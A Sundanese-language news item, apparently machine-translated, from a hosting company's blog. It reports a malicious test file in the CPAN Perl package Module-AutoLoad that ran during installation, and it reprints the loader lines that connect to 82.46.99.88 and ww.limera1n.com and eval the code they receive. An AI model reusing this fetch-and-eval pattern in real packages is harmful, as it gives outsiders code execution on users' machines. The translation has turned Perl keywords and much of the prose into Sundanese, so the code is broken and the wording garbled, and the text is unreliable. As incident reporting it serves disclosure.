ProHoster > Blog > warta internét > Kodeu jahat dideteksi dina pakét Module-AutoLoad Perl

Kodeu jahat dideteksi dina pakét Module-AutoLoad Perl

Dina pakét Perl disebarkeun ngaliwatan diréktori CPAN Modul-Autoload, dirancang pikeun otomatis ngamuat modul CPAN dina laleur, dicirikeun kode jahat. The sisipan jahat éta kapanggih dina kode tés 05_rcx.t, anu parantos dikirim ti 2011.
Éta noteworthy yén patarosan ngeunaan loading kode questionable timbul dina Stackoverflow deui 2016.

aktivitas jahat bisul handap kana usaha pikeun ngundeur tur ngaéksekusi kode ti server pihak katilu (http://r.cx:1/) salila palaksanaan test suite dibuka nalika masang modul. Hal ieu dianggap yén kode mimitina diundeur ti server éksternal teu jahat, tapi ayeuna pamundut ieu dialihkeun ka domain ww.limera1n.com, nu nyadiakeun porsi na kode pikeun palaksanaan.

Pikeun ngatur undeuran dina file 05_rcx.t Kodeu di handap ieu dianggo:

abdi $ prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
abdi $coba = `$^X $prog`;

Kodeu anu ditangtukeun nyababkeun naskah dieksekusi ../contrib/RCX.pl, eusina diréduksi jadi garis:

make lib do {eval<$b>&&botstrap ("RCX") lamun $b = IO anyar :: Socket :: INET 82.46.99.88. ": 1 ″};

Aksara ieu dimuat lieur ngagunakeun jasa perlobfuscator.com kode ti host éksternal r.cx (kode karakter 82.46.99.88 pakait jeung téks "R.cX") sarta executes eta dina blok eval.

$ perl -MIO :: Socket -e'$ b = IO anyar :: Socket :: INET 82.46.99.88. ": 1"; nyitak <$b>;'
eval ngabongkar u => q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Saatos unpacking, di handap ieu pamustunganana dieksekusi: di:

nyitak {$b = IO anyar:: Socket:: INET"ww.limera1n.com:80″}"GET /iJailBreak
"; evalor mulang ngingetkeun $ @ bari $ b;1

Paket anu bermasalah ayeuna parantos dipiceun tina gudang. REUREUH SAKEUDEUNG (Perl Authors Upload Server), sareng akun panulis modul dipeungpeuk. Dina hal ieu, modul masih tetep aya dina arsip MetaCPAN sarta bisa langsung dipasang ti MetaCPAN ngagunakeun sababaraha utiliti kayaning cpanminus. Kacatetyén pakét henteu disebarkeun sacara lega.

Metot ngabahas disambungkeun jeung panulis modul, anu nampik informasi yén kode jahat ieu diselapkeun sanggeus situs na "r.cx" ieu hacked sarta ngécéskeun yén anjeunna ngan ngabogaan fun, sarta dipaké perlobfuscator.com teu nyumputkeun hal, tapi pikeun ngurangan ukuranana. kode jeung nyederhanakeun nyalin na ngaliwatan clipboard. Pilihan nami fungsi "botstrap" dijelaskeun ku kanyataan yén kecap ieu "sora sapertos bot sareng langkung pondok tibatan bootstrap." Panulis modul ogé ngajamin yén manipulasi anu diidentifikasi henteu ngalakukeun tindakan jahat, tapi ngan ukur nunjukkeun beban sareng palaksanaan kode via TCP.

sumber: opennet.ru

Tambahkeun komentar